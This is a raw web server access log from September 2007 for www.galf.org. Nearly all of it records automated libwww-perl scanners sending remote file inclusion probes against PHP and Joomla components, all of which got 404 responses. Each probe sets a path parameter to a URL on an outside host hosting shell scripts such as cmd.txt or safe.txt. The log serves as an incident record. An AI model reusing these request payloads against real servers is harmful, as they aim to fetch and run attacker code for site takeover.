195.225.169.73 - - [16/Sep/2007:23:03:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:04:39 -0700] "GET /logs/middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.11.227.124 - - [16/Sep/2007:23:04:39 -0700] "GET /middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:23:05:16 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:23:05:17 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:23:05:17 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:23:05:36 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:23:05:36 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:23:05:36 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:08:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:08:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:08:57 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:08:57 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:08:58 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:08:58 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:10:35 -0700] "GET /logs/access_070827.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:10:36 -0700] "GET /logs/access_070827.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [16/Sep/2007:23:10:41 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:10:42 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.0.141.110 - - [16/Sep/2007:23:10:49 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
208.80.193.38 - - [16/Sep/2007:23:10:57 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc2; i686 Linux; 20021001)" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:11:22 -0700] "GET /logs/access_070806.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:11:22 -0700] "GET /logs/access_070806.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:23:11:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:11:54 -0700] "GET /logs/access_070618.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:11:54 -0700] "GET /logs/access_070618.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.129.152.113 - - [16/Sep/2007:23:13:18 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [16/Sep/2007:23:13:18 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.129.152.113 - - [16/Sep/2007:23:13:19 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:13:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:13:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.97.20.22 - - [16/Sep/2007:23:14:20 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [16/Sep/2007:23:14:20 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.97.20.22 - - [16/Sep/2007:23:14:21 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.78.60 - - [16/Sep/2007:23:14:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:23:14:28 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:23:14:28 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:14:39 -0700] "GET /logs/access_070730.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:14:40 -0700] "GET /logs/access_070730.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:14:59 -0700] "GET /logs/access_070723.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:14:59 -0700] "GET /logs/access_070723.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.78.60 - - [16/Sep/2007:23:15:52 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.78.60 - - [16/Sep/2007:23:15:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.32.66.186 - - [16/Sep/2007:23:18:30 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:21:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.11.227.124 - - [16/Sep/2007:23:21:27 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.0.141.110 - - [16/Sep/2007:23:21:59 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
75.0.141.110 - - [16/Sep/2007:23:22:00 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:22:19 -0700] "GET /logs/access_070820.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:22:19 -0700] "GET /logs/access_070820.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.32.66.186 - - [16/Sep/2007:23:22:29 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [16/Sep/2007:23:24:43 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [16/Sep/2007:23:24:43 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [16/Sep/2007:23:24:43 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:27:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:27:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:27:46 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:27:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:29:03 -0700] "GET /logs/access_070709.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:29:03 -0700] "GET /logs/access_070709.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:29:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:29:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:29:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:29:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:30:15 -0700] "GET /logs/access_070826.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:23:30:15 -0700] "GET /logs/access_070826.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:31:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:31:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.229 - - [16/Sep/2007:23:33:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.229 - - [16/Sep/2007:23:33:27 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.11.227.124 - - [16/Sep/2007:23:36:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:23:36:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:36:10 -0700] "GET /logs/index.php?go=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:36:10 -0700] "GET /index.php?go=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
219.239.89.26 - - [16/Sep/2007:23:37:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [16/Sep/2007:23:37:39 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:39:51 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:39:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:39:51 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.46.176.233 - - [16/Sep/2007:23:40:11 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:40:11 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:40:11 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:41:46 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:41:47 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:42:02 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:42:03 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:43:31 -0700] "GET /logs/manager/admin/index.php=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:43:31 -0700] "GET /manager/admin/index.php=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [16/Sep/2007:23:44:47 -0700] "GET /logs/access_070826.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:44:56 -0700] "GET /logs/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:23:44:57 -0700] "GET /index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:47:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:47:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:48:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
195.225.169.73 - - [16/Sep/2007:23:48:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:49:03 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:49:03 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:49:05 -0700] "GET /logs/access_070827.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:49:05 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:49:06 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [16/Sep/2007:23:49:18 -0700] "GET /logs/access_070625.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:49:30 -0700] "GET /logs/access_070827.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.46.176.233 - - [16/Sep/2007:23:49:30 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:49:30 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:50:01 -0700] "GET /logs/access_070716.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.233 - - [16/Sep/2007:23:50:28 -0700] "GET /logs/access_070716.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:50:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:50:50 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:23:52:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:52:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.231.170.10 - - [16/Sep/2007:23:52:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.180.173.59 - - [16/Sep/2007:23:52:59 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.wendelcruz.com/galeria/include/service.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.97.20.22 - - [16/Sep/2007:23:53:16 -0700] "GET /logs/access_070625.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:54:05 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:54:05 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:55:03 -0700] "GET /logs/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
